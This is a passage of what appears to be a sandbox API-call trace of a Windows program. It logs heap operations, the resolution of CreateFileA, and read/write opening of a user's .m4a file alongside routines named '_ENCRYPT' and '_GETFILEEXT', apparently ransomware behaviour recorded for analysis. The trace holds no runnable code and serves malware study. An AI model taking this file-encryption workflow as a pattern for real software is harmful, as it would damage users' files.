(HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0037.398] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0037.398] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0037.398] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0037.398] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0037.398] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0037.398] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0037.398] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0037.398] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0037.398] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0037.398] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0037.398] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0037.398] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0037.398] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0037.398] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0037.398] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0037.398] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0037.398] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0037.398] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0037.398] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0037.398] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0037.398] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0037.399] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0037.399] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0037.399] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0037.399] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0037.399] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0037.399] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0037.399] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0037.399] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0037.399] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0037.399] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0037.399] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0037.399] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0037.399] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0037.399] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0037.399] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0037.399] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb) returned 0x88ce68 [0037.399] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x88ce68, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0037.399] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0037.399] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFile") returned 0x0 [0037.399] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0037.400] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0037.400] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0037.401] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0ce8 [0037.401] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0037.401] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0037.401] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0037.401] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88ce68 [0037.401] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x88ce68, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0037.401] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0037.401] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFileA") returned 0x76e253c6 [0037.401] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0037.401] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0037.401] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0037.401] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0037.401] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0ce8 [0037.401] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0037.401] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0037.401] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0037.401] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0037.401] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0037.401] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0037.401] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0037.401] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10001) returned 0xaa0008 [0037.401] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\5kW9-9BV3.m4a", cchWideChar=50, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 50 [0037.401] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x32) returned 0x7c2080 [0037.401] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\5kW9-9BV3.m4a", cchWideChar=50, lpMultiByteStr=0x7c2080, cbMultiByte=50, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\5kW9-9BV3.m4a", lpUsedDefaultChar=0x0) returned 50 [0037.401] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2080 | out: hHeap=0x770000) returned 1 [0037.401] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0037.401] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0037.401] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0037.402] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0037.402] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0037.402] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0037.402] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0037.402] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0037.402] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\5kW9-9BV3.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\5kw9-9bv3.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0037.402] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4c8 [0037.402] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0037.402] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0ce8 [0037.402] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0037.402] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0037.402] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0037.402] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0037.402] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0037.402] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0037.402] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0037.402] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0037.402] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0037.402] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0037.402] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0037.402] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xaa0008, cbMultiByte=50, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 50 [0037.402] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x64) returned 0x7c10a8 [0037.402] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xaa0008, cbMultiByte=50, lpWideCharStr=0x7c10a8, cchWideChar=50 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\5kW9-9BV3.m4a") returned 50 [0037.402] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0037.402] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x70) returned 0x7db378 [0037.402] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c10a8 | out: hHeap=0x770000) returned 1 [0037.402] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xaa0008 | out: hHeap=0x770000) returned 1 [0037.402] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0037.403] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0037.403] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0037.403] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0037.403] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0037.403] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0037.403] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0037.403] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd90 [0037.403] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0037.403] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0037.403] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0037.403] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0037.403] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0037.403] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0037.403] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0037.403] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0037.403] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0037.403] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0037.403] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0037.403] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0037.403] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0037.403] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0037.403] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0037.403] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0037.403] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0037.403] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0037.403] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0037.403] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0037.403] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0037.403] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0037.403] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0037.403] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0037.404] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0037.404] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0037.404] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0037.404] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0037.404] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8895c8 [0037.404] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0037.404] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0037.404] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0037.404] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0037.404] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8895c8 | out: hHeap=0x770000) returned 1 [0037.404] FreeLibrary (hLibModule=0x76e10000) returned 1 [0037.404] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0037.404] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0037.404] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0037.404] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0037.404] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0037.404] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0037.404] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0037.404] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0037.404] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0037.404] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0037.404] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0037.404] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0037.404] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0037.404] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0037.404] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0037.404] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0037.404] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0037.404] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0037.404] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0037.404] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0037.404] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0037.404] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0037.405] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0037.405] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0037.405] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0037.405] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0037.405] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0037.405] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0037.405] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0037.405] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0037.405] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0037.405] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0037.405] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0037.405] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0037.405] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0037.405] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0037.405] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0037.405] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0037.405] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0037.405] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0037.405] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0037.405] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0037.405] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0037.405] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0037.405] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0037.405] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0037.405] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0037.405] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0037.405] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0037.406] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0037.406] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x8898c8 [0037.406] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x8898c8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0037.406] FreeLibrary (hLibModule=0x76e10000) returned 1 [0037.406] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0037.406] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0037.406] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0037.406] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0037.406] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0037.406] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0037.406] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af438 [0037.406] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0037.406] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0037.406] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.406] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0037.406] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0037.406] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0ce8 [0037.406] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0037.406] PeekMessageW (in: lpMsg=0x6aea94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea94) returned 0 [0037.406] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0037.406] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0037.406] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0037.406] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0037.406] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0037.406] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.406] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.406] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="m4a", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.407] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".m4a", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0037.407] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.407] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0037.407] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0037.407] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0037.407] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0037.407] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0037.407] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0037.407] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x70) returned 0x7db378 [0037.407] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.407] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0037.407] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0037.407] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) 